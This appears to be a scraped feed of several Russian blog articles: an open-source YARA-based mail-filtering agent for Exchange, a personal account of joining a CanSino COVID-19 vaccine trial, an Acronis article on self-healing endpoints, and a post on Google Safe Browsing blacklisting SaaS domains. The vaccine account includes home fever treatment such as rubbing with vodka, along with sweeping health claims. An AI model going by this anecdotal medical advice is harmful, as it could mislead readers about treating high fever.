Exchange довольно мощный и популярный почтовый сервер в мире энтерпрайза. Против угроз малварей и фишинга он имеет как встроенные механизмы защиты, так и возможность использования сторонних продуктов. Но в реальности этих возможностей не всегда достаточно для отлова всех вредоносных писем: малвари проходят к пользователям до того, как их сигнатуры попадут в антивирусные базы, а URL-адреса в репутационные списки. Поэтому мы разработали инструмент, помогающий бороться с различными угрозами, приходящими к нам по почте.

Пример зловреда, с которым встроенные механизмы Exchange не справилисьПример зловреда, с которым встроенные механизмы Exchange не справились

Как известно, в основном атаковать пользователя по почте можно двумя самыми распространенными способами: прицепить в теле письма вредоносные вложения или в тексте письма добавить ссылку, по которой пользователь должен перейти и скачать загрузчик.

Обычно у безопасников считается, что нужно учить пользователей правилам работы с почтой. Типовые корпоративные правила обращения с почтой для пользователей чаще всего сферические в вакууме и не отражают реальность. Например, пользователям советуют не открывать вложения и не переходить по ссылкам от незнакомых отправителей. Но что делать, когда у сотрудников работа заключается в том, чтобы открывать файлы от незнакомых отправителей? Внедренцы и продажники, специалисты по работе с поставщиками/партнерами - для них такие правила трудновыполнимы. Тем более, злоумышленник может подделать отправителя/зарегистрировать похожий на ваш домен и отправить зловреда на ваш почтовый ящик. Или отправить вредоноса со взломанного почтового ящика в старую переписку с сотрудником.

Против вложений у эксченджа есть встроенные механизмы, Вы можете указать потенциально опасные расширения файлов, по которым с письмом будут совершаться некоторые действия. Однако это не панацея защищаясь от эксплоитов в rtf или от html вложений с помощью блокировки расширений, вы не получите вполне легальные документы со счетами, что может навредить вашим бизнес-процессам. Да и злоумышленник может поменять расширение файла, и тогда фильтр пропустит опасное вложение. А против ссылок вообще ничего встроенного нет.

Мы в Контуре ежедневно получаем горы вредоносных писем, насмотрелись на разные варианты угроз, и если с вложениями как-то еще было можно бороться, то со ссылками была беда. Поэтому мы решили сделать свой транспортный агент библиотеку для Edge серверов для борьбы с прилетающими по почте вредоносами и фишингом.

История разработки

Сначала мы дописывали StripLinks, который в качестве примера транспортного агента представлен Microsoft, а затем прикрутили к нему функциональность опенсорсного ExchangeAttachmentFilter для фильтрации по имени файлов. Этого нам показалось мало и мы добавили туда анализ контента файлов алгоритмом Ахо-Корасик и регулярками, анализ текста, заголовков и темы письма, а еще обезвреживание автозапуска в pdf.

Получилось круто; во время эпидемий малварей, распространявшихся по почте, отдел информационной безопасности отдыхал и пил пиво на расслабоне. Но позже пришло понимание, что в текущем виде правила для анализа писать неудобно: они занимают много места в конфиге и вообще лучше бы использовать имеющиеся открытые инструменты для анализа вредоносных сигнатур.

И конечно в голову пришла очевидная идея прикрутить к агенту популярный инструмент YARA. Если брать мир опенсорса, то на тот момент подобные агенты существовали уже для популярных почтовых серверов типа постфикса, а для эксченджа ничего готового опенсорсного не нагуглилось. Находились платные варианты, но они обычно шли как часть функциональности почтового антивируса в довесок, а менять текущие антивирусы в планы не входило, так как это дорого и возможностей кастомизации гораздо меньше.

Попутно пришлось устранить всякие баги в YARA, из-за которых на сервере через N тысяч операций кончалась память, и служба транспорта падала.

Разработанное мы решили выложить обратно в опенсорс вдруг кому-то послужит с пользой, как нам. Вот ссылка на репозиторий с агентом.

Как это работает

Архитектура агента предполагает модульность: есть кучка небольших компонентов, каждый из которых умеет проверять что-то одно:

  • Совпадение отправителя и получателя письма

  • Опасные шаблоны в теме письма

  • Ссылки в тексте письма

  • Опасные шаблоны в тексте письма

  • Подделку MessageID

  • Потенциально опасные заголовки письма

  • SMTP сессию

  • Проверку вложения по имени

  • Проверку вложения YARA на наличие вредоносных сигнатур

  • Проверку содержимого архивов остальными файловыми модулями

Правила для проверки задаются в формате YARA-правил для файлового анализа и в XML для других модулей. В отличие от встроенных механизмов эксченджа, эти правила дают возможность полного контентного анализа, а не только поверхностного принятия решения на основе расширения файла.

Примеры сработки правил могут быть самые разные: опасные вложения, подмена адресов, наличие ссылок, определенные форматы, белые/черные списки любых параметров письма, определенные хеши, наличие в тексте каких-нибудь указанных кошельков, требование выкупа и так далее, на что фантазии хватит. Есть возможность создания как разрешающих, так запрещающих правил.

На основе сработавших правил каждого из модулей письму присваивается часть рейтинга. Для заведомо вредоносных сработок (например, эксплойтов) рейтинг будет меняться сильнее, а для потенциально опасных, но неточных угроз слабее. Исходя из суммарного рейтинга для письма принимается решение о действиях с письмом:

  • Пропустить

  • Отклонить

  • Добавить в тему письма надпись "опасно"

  • Добавить в письмо служебный заголовок, на который обратят внимание следующие инструменты защиты

Модули по заданным правилам могут логировать происходящее. Лог сохраняется в локальный файл в формате JSON. Например, полезно собирать инфу об урлах или статистические данные вроде количества похожих писем для разных получателей. У нас лог отправляется в elasticsearch, откуда мы уже забираем данные для дальнейшего анализа. Собранные данные можно отдельно прогонять по репутационным базам или проводить ретроспективный поиск при расследовании инцидентов.

Установка и конфигурирование агентов довольно простые. Конкретно используемые нами правила, конечно, мы не публикуем, но для примера добавлен базовый набор, на его основе легко будет сделать конфигурацию для ваших нужд.

Что мы хотим от публикации в опенсурс?

  • Идеи, как можно было бы улучшить/поправить инструмент

  • Помощь энтузиастов в развитии агента

  • Дать коллегам по цеху инструменты и идеи, как можно оградить своих пользователей от почтовых угроз

Подробнее..

Как я укололся китайской вакциной

18.01.2021 08:22:02 | Автор: admin

В мире сейчас ведется несколько клинических исследований вакцин от коронавируса. В России, кроме Спутника V разработали ЭпиВакКорона и другие, но мне встретилась онлайн реклама участия в третьей фазе исследования вакцины китайской компании Cansino. И я пошел сдаваться китайцам на опыты, не дожидаясь встречи с вирусом.

Cansino проводит клинические исследования в разных странах мира, включая Россию. Здесь требуется набрать 9000 добровольцев, хотя полное исследование включает 40000 человек. За участие в испытаниях ничего не платят, но выписывают страховку на случай заболевания коронавирусом в ходе исследований, т.е. в течение 12 месяцев. От самой вакцины заболеть нельзя, но в половине случаев добровольцы получают плацебо, и риск подцепить заразу в повседневной жизни остается. Вакцина тоже не дает 100% защиты, а вот насколько хорошо она защищает и не дает ли каких-то серьезных побочных эффектов и надо выяснить во время исследования.

Ad5-nCoV (Convidicea) компании Cansino Biologics это векторная вакцина, подобная Спутнику V. Ещё осенью ею привился Леонид Каганов. Потом встретился пост коллеги Александра Хохлова о его участии в исследованиях. Наконец и мне встретилась реклама в фейсбуке, и я перешел на сайт covidtrialrussia.ru. Там ответил на вопросы простенькой анкеты и оставил свой номер телефона. Несмотря на воскресный день, практически сразу перезвонили, но не с назначением на укол, а просто подтвердить, что заявка моя, а не кто-то пошутил. Мне сказали Вам позвонят в течение двух недель и назначат время.

Позвонили через три дня в среду. Пригласили на четверг, но я перенес на пятницу. Было любопытно, где, собственно, будет проводиться вакцинация китайским препаратом. Оказалось в Москве этим занимается ЦКБ РАН и знакомый логотип добавил уверенности.

В России же исследование проводится в 14 регионах:

Где именно

Москва, Санкт-Петербург, Нижегородская область, Новосибирская область, Омская область, Пермский край, Республика Татарстан, Рязанская область, Саратовская область, Свердловская область, Смоленская область, Томская область, Челябинская область, Ярославская область, Чита, Мурманская область.

Перед прививкой вручают листок информированного согласия, и дают определенное время на его ознакомление. Я пробежался по диагонали: детали проведения двойного слепого плацебоконтролируемого исследования, возможные побочные эффекты вакцины, отказ от ответственности, страховка и т.п. Поставил роспись подошел к стойке регистрации, но меня отправили читать дальше слишком быстро прочитал.

Когда время на ознакомление с документом вышло, провели взвешивание, и отправили к доктору в кабинет. Там еще несколько вопросов: болел ли короной, есть ли хронические заболевания, принимаю ли какие-либо лекарства постоянно Измерили давление, вручили упаковку с ампулой, и проводили в процедурный кабинет. Первым делом там надо сдать 25 г крови, и то же самое придется повторить через 12 месяцев. Об этом написано в договоре, и особенно умилило пояснение: 25 г крови это пять чайных ложек. Не знаю насколько уместны кухонные аналогии в таком деле, но лично у меня такое сравнение всколыхнуло детскую паранойю, что кабинеты для анализов крови это тайный мировой заговор вампиров. Кровь сдается для двух анализов: на ВИЧ и на антитела к ковиду.

С меня сцедили три мензурки крови (это было не так больно как 20 лет назад в военкомате) и, наконец, перешли к вакцине.

Укол практически безболезненный хвала современной цивилизации и сверхтонким иглам. После него надо еще полчаса провести под присмотром медперсонала на случай острой аллергической реакции. В моем случае никакого эффекта не ощутилось и со спокойной душой отправился домой. Это было примерно в 17:00, в пятницу 18 декабря.

Первые часы после укола не было вообще никаких изменений, на руке даже не осталось следа от иглы. Появилось опасение, что мне досталось плацебо. Для испытуемого это хуже всего, т.к. плацебо не дает никакой защиты, но для завершения исследования придется целый год жить как и весь предыдущий со всеми мерами предосторожностей: маски/перчатки/санитайзеры/очки. Во имя науки нужно постараться, но при желании предусмотрен выход из исследования, тогда можно просто пойти и уколоться Спутником V. В Москве сейчас это доступно практически для каждого непереболевшего. Как я понимаю, именно по этой причине третья фаза испытаний российской вакцины и провалилась из группы плацебо многие привились по собственной инициативе. Отличить укол вакцины от плацебо можно либо в побочных эффектах, либо тестом на антитела через несколько недель.

В моем случае заметные побочные эффекты начались к 2 часам ночи, т.е. примерно через 8-10 часов после укола: начался озноб, а за пару часов до этого легкая ломота в мышцах.

Чем сильнее колотил озноб тем больше было радости от того, что получил вакцину. Выиграл главную лотерею 2020-го!

Необычное ощущение, когда испытываешь полный комплекс симптомов болезни: озноб, рост температуры, головную боль, учащенное сердцебиение, но при этом не ощущаешь никаких негативных эффектов от патогенных микробов. Повышением температуры организм отреагировал на введение вирусных частиц аденовируса (сезонной простуды), которые используются в вакцине как средство доставки необходимого генетического кода коронавируса к нашей иммунной системе. При этом сам аденовирус не активный, т.е. он не может размножаться и вредить телу своей жизнедеятельностью, поэтому вся реакция организма на укол это работа иммунитета.

Мысли в больной голове оставались ясными, поэтому увлеченно наблюдал работу системы обеспечения теплового режима организма. У нас в теле нет специального термостата, который можно было бы подкрутить на плюс, поэтому организм идет на ухищрения. Наше тело вырабатывает тепло вследствие переваривания пищи. Тепло распределяется по организму кровеносной системой и затем, чтобы избежать перегрева, сбрасывается в окружающую среду в основном через излучение и конвекцию обдувание воздухом. Чтобы поднять внутреннюю температуру, организм снижает подачу крови к коже отсюда гусиная кожа и озноб таким образом повышается теплоизоляция организма. Озноб же вынуждает нас укутываться в одеяло, что ещё снижает конвекцию. В результате достигается рост внутренней температуры.

Подобный принцип работы схож с системой терморегулирования космических скафандров, там тоже есть свои кровь, кожа. Но главным источником тепла в скафандре остается человек, поэтому его можно считать продолжением человеческого тела, которое позволяет осваивать новые пространства. Впрочем, нашим инженерам еще далеко до успехов эволюции

Чтобы избежать перегрева организма и роста температуры, можно нарушить его планы: не заворачиваться по уши в толстое одеяло и сохранять конвективный теплоперенос и излучение. Часть ночи я так и делал, укрывался легким покрывалом и открывал форточку. Однако, к концу ночи организм победил, во сне я забрался под толстое одеяло, и на утро градусник показал пугающие 39,7.

Нагрузка на сердце тоже возросла: 112 ударов в минуту. Пульс выше сотни держался больше суток. Попытка сбить температуру при помощи Терафлю не привела к значимым успехам градусник показал 38,7, но через пару часов температура снова перевалила за 39. Зато озноб прошел, поэтому открытая форточка и растирание водкой для сбивания температуры сработали лучше парацетамола.

Всю субботу температура колебалась у отметки 39, и возникли опасения нормально ли это. Позвонил на телефон врача, который делал укол. Его ответ не сильно помог: Это нормально, скоро пройдет, выпейте таблетку парацетамола и ложитесь спать. Зато знакомый терапевт выразил больше опасений. Из его объяснений я понял, что самый главный вред, который может нанести слишком высокая температура для мозга, поэтому в случае жара важно держать голову холоднее остального тела. Ещё он рекомендовал несколько препаратов, кроме парацетамола, но я решил обойтись народными средствами холодное мокрое полотенце на голове сработало. На вторую ночь после укола, перед сном всё же ещё выпил таблетку парацетамола.

Утром, в воскресенье, было 37,6. Голова еще болела, но было понятно, что иммунный ответ на прививку снижается. К вечеру температура опустилась до нормы, вернулся аппетит, правда вкусы стали весьма специфичны. В конце дня смог выбраться в магазин, и набрал маринованных огурцов и томатного сока. Хотелось чего-то соленого и с резким вкусом.

Следующие три дня сохранялся шум в голове и ощущение легкого похмелья, но через неделю после укола практически все его последствия исчезли, только слегка побаливало место укола как синяк от удара. На вторую неделю прошло и это ощущение.

Если честно, я не ожидал такой резкой реакции организма на вакцину, и мой личный опыт не позволяет рекомендовать её для массового применения. Такие приключения подходят только для здорового организма, который регулярно занимается физической активностью. Своим родителям я бы таких выходных не пожелал, хотя вирус ещё хуже. Хотя по данным второй фазы исследований, чем выше возраст тем слабее реакция организма на прививку.

Несмотря на всё о своем эксперименте нисколько не жалею, и рекомендую всем здоровым прививаться как можно скорее, прежде всего потому, что молодые и бессимптомные лучшие разносчики.

Отказников от вакцины можно понять, но теперь у нас есть выбор: если в 2020-м заболевший коронавирусом воспринимается как жертва, то в 2021-м будет сама виновата, т.к. надо было прививаться.

Ради любопытства, нашел статью в Lancet о втором этапе клинических испытаний вакцины Cansino, которая проводилась на 508 добровольцах. Их разделили на три группы: плацебо; 50% (510^10 активных частиц на 1 мг); 100% (110^11 активных частиц на 1 мг).

Оказалось, что сильная ответная реакция организма, возникала в 9% случаев в той группе, которая получала максимальную дозу второго этапа исследований, и 1% в группе половинной дозы. На третьем этапе, исследований, в которой участвую и я, судя по всему, оставили только половинную дозу. То есть побочные эффекты, сравнимые моими, возникают у одного на сотню. Для сравнения, в Спутнике V в уколе количество активных частиц колеблется между 50% и 150%.

Через две недели и месяц у испытуемых вакцины Cansino измерялся уровень антител на коронавирусный спайк-белок (RBD) и иммунных Т-клеток. Любопытно, что разница в количестве выработанных антител между получившими половину и полную дозу вакцины составило около 15%.

Правда, есть ещё один фактор наличие иммунитета к аденовирусу, который использовался для доставки генетической информации коронавируса к нашей иммунной системе. Если человек уже переболел этим штаммом аденовируса, то эффективность вакцины будет снижена примерно на половину. Именно по этой причине Спутник V требует два укола там используются разные аденовирусы, что повышает вероятность формирования устойчивого иммунитета от короны. Впрочем, исследования в полях пока не подтверждают снижение эффективности вакцины Cansino по этой причине.

Через 28 дней я по собственной инициативе сделал количественный тест на антитела (спайковый (S) белок, IgM, качественно и IgG, количественно) в Helix и получил вот такой результат:

IgM отрицательный, значит перед уколом не болел.IgG 58,2 ОЕ/мл, а всё что больше 15 ОЕ/мл считается высоким уровнем антител.IgM отрицательный, значит перед уколом не болел.IgG 58,2 ОЕ/мл, а всё что больше 15 ОЕ/мл считается высоким уровнем антител.

Потом, можно будет сдать тест еще через полгода и сравнить. По условиям клинических исследований, придется еще проверяться через 12 месяцев после укола и на этом мое участие в качестве подопытного завершится. Кроме этого каждую неделю я сообщаю информацию о самочувствии по SMS и раз в месяц запланирован созвон с доктором.

Продолжаю наблюдения.

По результатам обсуждения в соцсетях своего эксперимента подготовил

FAQ

Это вообще законно испытывать китайскую вакцину в России?
Да, Минздрав разрешил.

Почему китайскую вакцину не испытывают на китайцах?
Испытания нужны для проверки эффективности вакцины против вируса, а в Китае сейчас сложно заразиться.

Почему выбрал китайскую вакцину, а не Спутник V?
Пандемия это проблема всего мира, а не только России. Клинические исследования российского Спутника V фактически провалились, т.е. без одобрения международных регуляторов его можно будет использовать только в России и некоторых странах, которые готовы игнорировать международные стандарты разработки и сертификации лекарств. Я решил поддержать тех разработчиков, которые играют по правилам и делают вакцину не для себя, а для всего мира.

Хотя, чисто технически, между китайской и российской вакциной разницы нет, и если бы не было альтернативы, то пустил бы и спутник по вене.

Не проще ли переболеть вместо прививки?
Прививка имеет ряд преимуществ по сравнению даже с легким и бессимптомным течением болезни:

  • Вероятность получить осложнение от прививки в несколько раз ниже чем осложнения от болезни. Длительных и опасных для жизни негативных последствий типа тромбоза или повреждения тканей легких от прививок тоже нет.

  • Прививка формирует более устойчивый иммунитет, с большим количеством антител.

  • Привитый человек не превращается в ходячее оружие массового поражения как бессимптомные распространители.

Зачем мне прививаться, если я не в группе риска?
Затем, что осложнения от вируса получали и молодые. Даже вне группы риска, ковид это игра в русскую рулетку, причем не только со своей головой. Всегда надо помнить, что в обществе мы живем не одни, любой заболевший, даже молодой и бессимптомный это потенциальная угроза для групп риска дома, на работе, в магазинах, общественном транспорте и т.д. Более того, именно бессимптомные молодые главное средство распространения вируса, т.к. именно они ведут активный образ жизни.

Нужно ли прививаться всем или только группам риска?
Группы риска нужно прививать чтобы снизить для них угрозу заражения и получения тяжелых осложнений от вируса. Вне групп риска прививаться надо для остановки распространения вируса. Эпидемиологи говорят, что для победы над пандемией надо достичь 50-60% популяции с антителами, т.е. переболевших и привитых. Учитывая антипрививочную вакханалию в интернете, любой здравомыслящий привитый это ценный вклад в общую победу над вирусом.

Если переболел, то нужна ли прививка?
Сразу после болезни не нужна, но через 4-6 месяцев после выздоровления лучше уколоть. Если болезнь протекала легко, то прививаться можно через 4, если тяжело, то через 6 месяцев. Повторные случаи заражений уже известны, причем второй раз зачастую бывает тяжелее первого.

Сейчас появился новый штамм вируса, прививка сработает на нем?
Пока работает. Если вирус сильно мутирует, придется и вакцину менять, но появление новых штаммов не означает исчезновение старых, поэтому прививаться стоит от всех.

А если я от вида иголки в обморок падаю?
Лучше упасть в обморок от вида иголки, чем от нехватки кислорода в крови или чего похуже. Смотрите в потолок процедурного кабинета, со мной это работает, а иголки сейчас такие тонкие, что уколы почти не чувствуются.

Если привился можно ли теперь тусоваться и ходить без маски?
Некоторые так и делают, но не стоит забывать, что вакцина не дает 100% защиты. Я как и прежде хожу в общественных местах в маске и перчатках, т.к. это сегодняшняя норма поведения в обществе, которому еще далеко до 60%-го иммунитета.

По моей идее дизайнер Андрей Ларин @engine9 разработал символ вакцинированных, а я напечатал его и ношу значок как медаль за укол:

Всех чипированных приглашаю присоединиться к флешмобу.

Ты привился чтобы набрать классы?
Нет, чтобы остановить заразу, которая испортила жизнь мне и многим другим. Но мотивация в прививке может быть любая: для остановки ковида, для безопасности себя и окружающих, для походов по барам, для путешествий, для успокоения совести, во славу науке, для того чтобы набрать классы Сейчас главное победить вирус.

Будьте здоровы!

Подробнее..

Что нужно для самовосстановления удаленных рабочих мест?

25.03.2021 14:07:14 | Автор: admin
How close is the reality of self-repairing endpoints?How close is the reality of self-repairing endpoints?

По мере того, как рабочие места во всех странах планомерно переехали из офисов в домашние сети, проблема простоев и восстановления после сбоев стала намного более острой. В этом посте мы поговорим о том, какие технологии позволяют обеспечить возможность самовосстановления рабочего места, а также о преимуществах интегрированных решений для конечных точек.

Хотим мы этого или нет, но мир постепенно двигается к действительно распределенным инфраструктурам. Если до 2020 года речь шла о мобильных устройствах и BYOD, то с началом пандемии лидерами по подключению к корпоративным сетям стали домашние компьютеры.

В одном из прошлых постов (ссылка) мы говорили о результатах исследования Acronis Cyber Readiness Report. Отчет показал, что более трети всех компаний в мире столкнулись с проблемой подключения и управления новыми устройствами. И проблема обеспечения надежной защиты данных на этих часто вообще никак не сконфигурированных для рабочих процессов компьютеров, является не единственной. Оказалось, что обеспечить постоянную доступность удаленного рабочего места тоже непросто особенно с учетом явного смещения фокуса внимания киберпреступности на удаленных работников.

По данным исследования Acronis Cyber Threats 2020 (ссылка), За прошлый год 31% компаний были атакованы каждый день, причем версии вредоносного ПО постоянно обновлялись среднее время жизни одного экземпляра не превышало 4 дня. Подобное положение дел создает реальный риск взлома хотя бы одной системы из корпоративного периметра (который давно уже не периметр, а решето). При этом аналитики из Aberdeen сообщают, что стоимость простоя рабочих мест на протяжении часа даже для СМБ может составлять до $8,600 в час. В случае с крупным бизнесом все еще хуже при неудачном стечении обстоятельств, простой может обойтись в сотни тысяч долларов в час по мнению аналитиков Gartner.

Что с этим делать, если рабочие места теперь физически разбросаны по миру? В идеале хотелось бы, чтобы компьютеры могли самостоятельно привести себя в порядок. Для этого нужно, чтобы на конечном устройстве уже было установлено ПО, которое способно отразить атаку, восстановиться и не допустить повторения инцидента. Может показаться, что все это из разряда фантастики, но на самом деле уже сегодня подобные модели киберзащиты реализованы на практике.

Интеграция компонентов играет ключевую роль

Сама идея автономной киберзащиты с возможностью самовосстановления включает в себя интеграцию компонентов систем безопасности, в том числе использующих искусственный интеллект. Например, корпоративные системы кибербезопасности могут работать вместе со средствами защиты конечных точек. Что интересно, при этом каждый из защитных компонентов помогает повысить эффективность другого.

Самый простой пример интеграция между системой резервного копирования и средствами киберзащиты на базе ИИ. Если в компании регулярно создаются резервные копии, значит искусственному интеллекту можно предложить огромное количество примеров рабочего места или сервера, который находится в нормальном состоянии. Применив к этому набору данных методику машинного обучения, мы можем повысить эффективность обнаружения вредоносной активности, а также лучше распознавать многократно проверенные процессы то есть снизить уровень ложных срабатываний. Такой подход помогает сэкономить время специалистов и сократить время простоя систем.

С другой стороны, восстановление рабочего места из резервной копии в ручном режиме это достаточно затратная по времени задача. Более того, иногда сотрудники, находящиеся в удаленном режиме работы, не могут сделать это самостоятельно, и тогда приходится говорить о дополнительном времени простоя, подключении ИТ-специалистов и так далее.

Но в случае отлаженной интеграции между системой резервного копирования и противодействия вредоносной активности помогает ускорить и упростить этот процесс. Например, после атаки на рабочее место можно автоматически распознать поврежденные файлы и запустить их фоновое восстановление. Также полезно оказывается сканировать уже созданные резервные копии на предмет наличия вредоносных файлов, чтобы не получить сюрприз после восстановления. Учитывая, что скорость генерации новых версий вредоносного ПО растет в геометрической прогрессии, такая проверка может выявить недавно полученные заражения.

Патчи и самовосстановление

Однако восстановление это еще не все. Например, корпоративные пользователи решений Acronis много раз жаловались на то, что восстановить рабочее место в зараженном окружении оказывается невозможно. При попытке удаленно развернуть полнодисковый образ ОС, они почти сразу получали зараженную машину, потому что вирус, червь или троян использовал незакрытую в этом образе уязвимость.

Поэтому, если мы говорим о реальной устойчивости систем к атакам, к потребностям восстановления хочется добавить еще один аспект установку патчей. Это позволяет дополнительно снизить потенциальное время простоя, исключая возможность повторной атаки через те же самые бреши. Сейчас в большинстве случаев этим занимается ИТ-департамент. И существует целый ряд причин, по которым патчинг происходит нерегулярно. Однако при интеграции в общий контур киберзащиты системы патч-менеджмента мы можем автоматизировать этот процесс.

В общем-то именно это стало причиной нашего стремления встроить систему патч-менеджмента в единый контур киберзащиты. На практике все это работает очень просто в случае обнаружения атаки соответствующий модуль проверяет, не появилось ли обновлений безопасности для определенной ОС или ПО, а далее автоматически загружает и устанавливает их.

Как это будет работать на практике?

На самом деле постепенное внедрение комплексных средств киберзащиты приводит к тому, что такой подход уже работает. В числе результатов минимизация простоев, более надежная защита корпоративных данных и, что немаловажно, освобождение ресурсов ИТ-персонала. Ведь если у клиента система сама обнаружила атаку, сама нашла патч и сама восстановилась, тикет в службу поддержки вообще не заводится, а сотрудник просто продолжает работать, когда все действия модулей защиты будут завершены. Если же атака не повлияла на работоспособность системы в целом, то процессы восстановления вообще могут проходить в фоновом режиме.

Расскажите, доводилось ли вам сталкиваться на практике со сложностью восстановления рабочих мест удаленных сотрудников? Есть ли у вас мысли по организации самовосстановления эндпоинтов или, быть может, в вашей компании уже используется такая практика? Поделитесь своими мыслями в комментариях.

Подробнее..

Перевод У Google появился новый креативный способ убивать SaaS-стартапы

19.01.2021 18:13:47 | Автор: admin
В старые времена, когда компания Google (или любой из её плохо настроенных ИИ) хотела убить ваш бизнес, то обычно отказывала вам в доступе к какому-то из своих сервисов, и это работало. Вы наверняка слышали страшилки:



Клянусь, я прочитал FAQ!

Всё проходит по одному сценарию. Сначала бизнес сознательно использует сервисы Google таким образом, что его выживание полностью зависит от них. Затем автоматизированный бегемот Google делает своё дело: он слегка меняет положение своей задницы на кожаном кресле размером с планету и, сам того не замечая, крушит в процессе мириады (относительно) маленьких компаний размером с муравья. И, наконец, компании размером с муравья отчаянно пытаются сообщить Google, что они раздавлены, но могут пообщаться только с автоматизированной формой для предложений.

Иногда генеральный директор размером с муравья знает кого-то в Google, потому что они были приятелями по колледжу, или технический директор пишет пост, который каким-то образом попадает на первую страницу муравейника Hacker News. Тогда Google замечает проблему и иногда считает её достойной решения, обычно из-за страха регулятивных последствий, которые может повлечь за собой муравьиная революция.

По этой причине общепринятая муравьиная мудрость диктует, что нельзя чрезмерно полагаться на сервисы Google. И если вам удастся избежать этой зависимости, всё должно быть в порядке.


Такая плоская синяя поверхность с классной красной крышей! Так удобно!

Что нового под Луной


В сегодняшней серии Интернет уже не тот, что раньше поговорим о новом способе, которым Google может непреднамеренно сокрушить ваш стартап. Он не требует от вас использования сервисов Google каким-либо (преднамеренным) способом.

Вы знали, что ваши домены могут попасть в чёрный список Google без каких-либо особых причин и что этот чёрный список использует не только Google Chrome, но и несколько других вендоров программного и аппаратного обеспечения? Вы знали, что эти другие вендоры синхронизируют список с дико изменяющимися таймингами и интерпретациями, так что решение любых проблем становится чрезвычайно напряжённым и непредсказуемым делом? При этом сроки рассмотрения жалоб на чёрный список в Google измеряются неделями?


Теперь так выглядит ваш сайт или SaaS-приложение

Эта функция чёрного списка называется Google Safe Browsing, и на изображении выше можете прочитать сообщение, которое видят посетители вашего сайта, если один из доменов попал в базу Safe Browsing. Тексты предупреждений варьируются от Обманный сайт до Сайт содержит вредоносное ПО (полный список здесь), но все они на одинаково страшном красном фоне, который пытается максимально помешать пользователю перейти на сайт.

В первый раз мы узнали о проблеме из-за всплеска жалоб от клиентов, которые натыкались на это красное предупреждение при попытке использовать наше SaaS-приложение. Во второй раз мы лучше подготовлены, поэтому у нас уже есть свободное время, чтобы написать этот пост.

Наша компания InvGate это SaaS-платформа для IT-подразделений, работающая на AWS. Она обслуживает более 1000 корпоративных клиентов и миллионы конечных пользователей. Фирмы используют продукт для управления тикетами и запросами от своих пользователей. Можете представить реакцию IT-менеджеров, когда внезапно их система тикетов начинает показывать конечным пользователям такие зловещие предупреждения безопасности.

Когда мы впервые столкнулись с этой проблемой, то отчаянно пытались понять, что происходит, и разобраться, как работает Google Safe Browsing (GSB), в то время как техподдержка пыталась справиться с потоком запросов от клиентов. Мы быстро поняли, что в базу GSB попал URL на Amazon Cloudfront CDN, с которого мы раздавали статические ресурсы (CSS, Javascript и др.), и это привело к сбою всего приложения для клиентов, использующих именно данный CDN. Быстрый обзор помеченной системы показал, что всё выглядит нормально.

В то время как команда девопсов работала в авральном режиме, чтобы настроить новый CDN и подготовиться к перемещению клиентов на новый домен, я обнаружил в документации Google, что через Google Search Console (GSC) можно получить дополнительные объяснения о причинах, почему сайт помечен в базе. Не буду утомлять вас подробностями, но чтобы получить доступ к этой информации, вы должны доказать владение сайтом, для этого настроить кастомную запись DNS или загрузить некоторые файлы в корень домена. Мы сделали это и через 20 минут получили отчёт о нашем сайте.

Отчёт выглядел примерно так:


Это не особенно информативно

В отчёте также была кнопка Запросить проверку (Request Review), которую я быстро нажал, фактически не предпринимая никаких действий на сайте, поскольку там не было никакой информации о предполагаемой проблеме. Я подал заявку с пометкой, что у меня не указаны вредоносные URL, хотя в документации говорится, что Google всегда предоставляет примеры URL, чтобы помочь веб-мастерам в выявлении проблем.


Отлично! Запрос на проверку недействительного отчёта может привести к тому, что будущие проверки станут ещё медленнее

Примерно через час сайт был удалён из базы GSB, мы даже не закончили выводить клиентов с этого CDN. Примерно через два часа пришёл автоматический email с подтверждением, что проверка прошла успешно. Никаких разъяснений, что вызвало проблему.

Что было дальше


В течение недели после инцидента мы продолжали периодически получать от клиентов сообщения о проблемах с доступом.

Google Safe Browsing предоставляет два различных API для использования в коммерческих и некоммерческих продуктах. В нашем случае проблема воспроизводилась по крайней мере у некоторых пользователей Firefox, а также в некоторых антивирусах и сетевых устройствах безопасности. Они помечали наш сайт и блокировали доступ к нему много дней спустя.

Мы продолжали переводить всех клиентов со старого CDN на новый, и поэтому в конце концов решили проблему навсегда. Мы никогда так толком и не узнали причину и списали всё на какой-то обкуренный ИИ в штаб-квартире Google.

Как помешать Google Safe Browsing пометить ваш сайт


Если вы управляете SaaS-бизнесом и обещаете клиентам гарантированную доступность, то внесение в базу Google Safe Browsing без какой-либо конкретной причины представляет собой очень реальный риск для бизнеса.

К сожалению, учитывая чисто гугловскую непрозрачность механизма пометки и просмотра сайтов, вряд ли этого можно гарантированно избежать. Но вы, безусловно, можете спроектировать своё приложение и процессы таким образом, чтобы свести к минимуму вероятность этого, снизить влияние фактического внесения в чёрный список и свести к минимуму время, необходимое для решения проблемы.

Вот шаги, которые предпринимаем мы сами и которые я могу рекомендовать:

  • Не держите все яйца в одном домене. Видимо, GSB помечает целые домены или поддомены. Поэтому лучше распределить приложения по нескольким доменам, так как это уменьшит ущерб от потери любого из них. Например, company.сom для сайта, app.company.net для приложения, eucdn.company.nеt для клиентов в Европе, useastcdn.company.nеt для клиентов на восточном побережье США и т.д.
  • Не размещайте данные клиентов на основных доменах. Домены часто попадают в чёрный список из-за того, что клиенты SaaS по неведению загрузили на сервер вредоносные файлы. Эти файлы безвредны для систем, но само их существование может привести к тому, что весь домен будет занесён в чёрный список. Всё, что ваши пользователи загружают в приложения, должно размещаться за пределами основных доменов. Например, используйте companyusercontent.cоm для хранения клиентских файлов.
  • Активно заявляйте о своём праве собственности на домены в Google Search Console. Это не помешает сайту попасть в чёрный список, но вы получите электронное письмо, которое позволит быстро отреагировать на проблему. Реагирование на такие инциденты занимает некоторое время, и это драгоценное время, в течение которого страдают ваши клиенты.
  • Будьте готовы сменить домен, если нужно. Это самое сложное, что можно сделать, но это единственный эффективный инструмент против попадания в чёрный список: спроектируйте системы так, чтобы доменные имена сервисов можно было легко изменить (через скрипты или инструменты оркестровки). Например, пусть у eucdn.company2.net будет CNAME-запись eucdn.company.net, и если первый заблокирован, обновите конфигурацию приложения, чтобы загрузить ресурсы с альтернативного домена.

Что делать, если ваше SaaS-приложение или сайт занесены в чёрный список Google Safe Browsing


Вот что я бы порекомендовал:

  • Если можете легко и быстро переключить своё приложение на другой домен, это единственный способ надёжно, быстро и якобы окончательно решить инцидент. Если можете, сделайте так. На этом всё.
  • В противном случае, как только вы идентифицируете заблокированный домен, просмотрите отчёты в Google Search Console. Если вы до сих пор не заявили о владении доменом, придётся сделать это прямо сейчас, что займёт некоторое время.
